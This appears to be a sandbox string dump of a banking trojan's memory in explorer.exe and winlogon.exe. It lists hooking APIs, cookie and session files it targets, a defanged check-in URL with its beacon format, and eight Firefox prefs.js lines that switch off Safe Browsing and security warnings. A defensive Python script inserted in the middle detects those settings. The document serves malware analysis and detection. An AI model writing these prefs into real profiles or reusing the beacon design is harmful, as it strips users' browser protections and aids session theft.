CertEnumCertificatesInStore
CertOpenSystemStoreA
CRYPT32.dll
ntdll.dll
WS2_32.dll
FindCloseUrlCache
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
WININET.dll
SHLWAPI.dll
GetProcessHeap
DisconnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
WaitNamedPipeA
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
EnumWindows
GetKeyState
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptGetKeyParam
CryptGetUserKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
3-33383|3
6"6(6-676
RapportUtil.
(GMT %su:u) %s
\prefs.js
RapportTanzan36.
RapportKoan.
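Among the strings above are eight `user_pref(...)` lines that, written into a profile's `prefs.js` (also named above, next to `profiles.ini` and `nspr4.dll`), switch off Firefox's Safe Browsing, its weak-crypto and mixed-content warnings, and cookie and session clearing on shutdown, so that injected content loads silently and stolen sessions survive a restart. The Python below is an added example for this page, not the report's own code: it parses a prefs.js file, lists which of those eight prefs hold the value the injected code writes, and treats all eight together as the malware's signature rather than a user's choice. The two prefs.js texts it runs on are constructed.

```python
import re

# The eight prefs the injected code writes (strings recovered in this report),
# with the value each is forced to.
SPYEYE_PREFS = {
    "browser.safebrowsing.enabled": False,
    "browser.safebrowsing.malware.enabled": False,
    "security.warn_entering_weak": False,
    "security.warn_entering_weak.show_once": False,
    "security.warn_viewing_mixed": False,
    "security.warn_viewing_mixed.show_once": False,
    "privacy.clearOnShutdown.cookies": False,
    "privacy.clearOnShutdown.sessions": False,
}

# user_pref("name", <JS literal>);  with an escaped-quote-aware name group.
PREF_RE = re.compile(r'^\s*user_pref\("((?:[^"\\]|\\.)+)",\s*(.*?)\);\s*$')


def _literal(raw):
    """Convert the JS literal in a user_pref() line to a Python value."""
    if raw == "true":
        return True
    if raw == "false":
        return False
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    try:
        return int(raw)
    except ValueError:
        return raw  # leave anything unexpected as-is rather than guess


def parse_prefs(text):
    """Map pref name -> value for every user_pref() line; other lines are ignored."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_RE.match(line)
        if m:
            prefs[m.group(1)] = _literal(m.group(2).strip())
    return prefs


def audit_prefs(text):
    """Report which of the eight weakenings are present in a prefs.js text."""
    prefs = parse_prefs(text)
    forced = sorted(name for name, bad in SPYEYE_PREFS.items() if prefs.get(name) == bad)
    return {
        "forced": forced,
        "count": len(forced),
        # All eight together is the malware's signature; one or two can be a user's choice.
        "likely_tampered": len(forced) == len(SPYEYE_PREFS),
    }


# Constructed prefs.js contents: a profile as the injected code leaves it, and a clean one
# in which a user has turned off a single warning by hand.
TAMPERED_PREFS_JS = """\
# Mozilla User Preferences
user_pref("app.update.lastUpdateTime.background-update-timer", 1439848800);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("browser.startup.homepage", "https://example.org/");
"""

CLEAN_PREFS_JS = """\
# Mozilla User Preferences
user_pref("browser.startup.homepage", "https://example.org/");
user_pref("security.warn_viewing_mixed", false);
"""


if __name__ == "__main__":
    for label, text in (("tampered", TAMPERED_PREFS_JS), ("clean", CLEAN_PREFS_JS)):
        print(label, audit_prefs(text))
```

Run it over every `prefs.js` under each profile listed in `profiles.ini` on a suspect host; a profile that scores all eight is a stronger indicator than any one setting, and the same profile directory is where the `cookies.sqlite` and `sessionstore.js` files named above, which the injected code also targets, live.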
Explorer.EXE_532_rwx_00FF0000_00002000:
!EYEc:\%original file name%.exe
C:\trivax1.Bin\
trivax1.Bin.exe
config.bin
OC93rK.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
trivax1.Bin
Microsoft Windows
Explorer.EXE_532_rwx_01E00000_00005000:
.text
`.rdata
@.data
.reloc
PSSSSSSh
Advapi32.dll
guid=%s&ver=%u&ie=%s&os=%u.%u.%u&ut=%s&ccrc=X&md5=%s&plg=%s
%s?%s&stat=online
hXXp://VVV.microsoft.com
%s?%s&%s
ntdll.dll
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
ADVAPI32.dll
customconnector.dll
TakeBotExeMd5Callback
5.1.2600!XP7!A8A67A25
hXXp://traxbax.com/user/gate.php
Explorer.EXE_532_rwx_0BAD0000_00045000:
.text
.reloc
config.dat
explorer.exe
threadmetadata!nfo%d
XX
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
0xx
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
Content-Length: %u
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies.txt
sessionstore.js
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite
GdiplusShutdown
gdiplus.dll
\\.\pipe\processingpipe_
services.exe
csrss.exe
smss.exe
\\.\pipe\globpluginspipe
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
nspr4.dll
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\%s
\Content.IE5\*.*
set_url
PFXImportCertStore
user32.dll
%d.%d.%d
keys
http:
urlmask
cert
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
Explorer.EXE_532_rwx_0BB50000_0004F000:
.text
.reloc
config.dat
explorer.exe
screenshots.txt
threadmetadata!nfo%d
XX
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
0xx
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
Content-Length: %u
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies.txt
sessionstore.js
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite
GdiplusShutdown
gdiplus.dll
\\.\pipe\processingpipe_
services.exe
csrss.exe
smss.exe
\\.\pipe\globpluginspipe
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
nspr4.dll
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\%s
\Content.IE5\*.*
set_url
PFXImportCertStore
user32.dll
%d.%d.%d
keys
http:
urlmask
cert
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
HttpSendRequestA
HttpSendRequestW
hXXp://
hXXps://
HTTP/1.
.mpeg
.jpeg
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpAddRequestHeadersA
HttpOpenRequestA
wlcomm.exe
msmsgs.exe
msnmsgr.exe
PR_OpenTCPSocket
kernel32.dll
Crypt32.dll
Advapi32.dll
ws2_32.dll
wininet.dll
Ht.Ht!HHt
w SSh
SSSSh
t.VPW
%System%\WININET.dll
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\USER32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
trivax1.Bin.exe
config.bin
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
trivax1.Bin
Microsoft Windows
%System%\ADVAPI32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
CertCloseStore
CertAddCertificateContextToStore
CertOpenStore
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertNameToStrA
CertEnumCertificatesInStore
CertOpenSystemStoreA
CRYPT32.dll
ntdll.dll
WS2_32.dll
FindCloseUrlCache
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
WININET.dll
SHLWAPI.dll
GetProcessHeap
DisconnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
WaitNamedPipeA
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
EnumWindows
GetKeyState
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptGetKeyParam
CryptGetUserKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
3-33383|3
6"6(6-676
RapportUtil.
(GMT %su:u) %s
\prefs.js
RapportTanzan36.
RapportKoan.
winlogon.exe_680_rwx_0BAD0000_00045000:
.text
.reloc
config.dat
explorer.exe
webinjects.txt
screenshots.txt
threadmetadata!nfo%d
XX
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
0xx
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
Content-Length: %u
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies.txt
sessionstore.js
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite
GdiplusShutdown
gdiplus.dll
\\.\pipe\processingpipe_
services.exe
csrss.exe
smss.exe
\\.\pipe\globpluginspipe
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
